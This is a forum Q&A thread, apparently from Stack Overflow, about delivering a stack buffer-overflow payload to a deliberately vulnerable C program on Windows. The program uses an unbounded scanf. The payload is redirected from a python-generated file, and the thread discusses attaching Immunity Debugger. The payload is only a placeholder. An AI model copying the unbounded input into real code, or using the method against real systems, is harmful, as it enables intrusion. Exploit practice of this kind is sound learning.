1

I'm trying to exploit a buffer overflow vulnerability in a C program, I have control of EIP but I don't know how to send the payload to the program. Here's the source:

#include <cstdio>

int main() {
    char name[32];
    printf("Enter your name and press ENTER\n");
    scanf("%s", name);
    printf("Hi, %s!\n", name);
    return 0;
}

How can I insert the payload (BUFF + EIP + NOPs + Shellcode) in the name variable? In Linux its some like $(python -c 'print "BUFF + EIP + NOPs + Shellcode') how can I do this in windows? If possible with a python script.

Thanks.

Improve this question

1 Answer 1

Reset to default
2

If pipe functionality is not available, you can use a temporary file to pipe the payload.

As

python -c 'print "BUFF + EIP + NOPs + Shellcode' > payload.txt
vulnbrable_binary.exe < payload.txt
Improve this answer
Sign up to request clarification or add additional context in comments.

11 Comments

Thank you, I can do it in cmd.exe however in Immunity passing < payload.txt as an argument doesn't work.
In that case you can start the process externally from cmd and then attach immunity to it.
Also while selecting files to run with immunity you can specify command line arguments. You can try giving < payload.txt there
If I use vulnbrable_binary.exe < payload.txt the program terminates before I can attach it in Immunity
For this exercise I have the source code however I need to get a working solution for when the source is not available. Thank you for all your help.
|

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.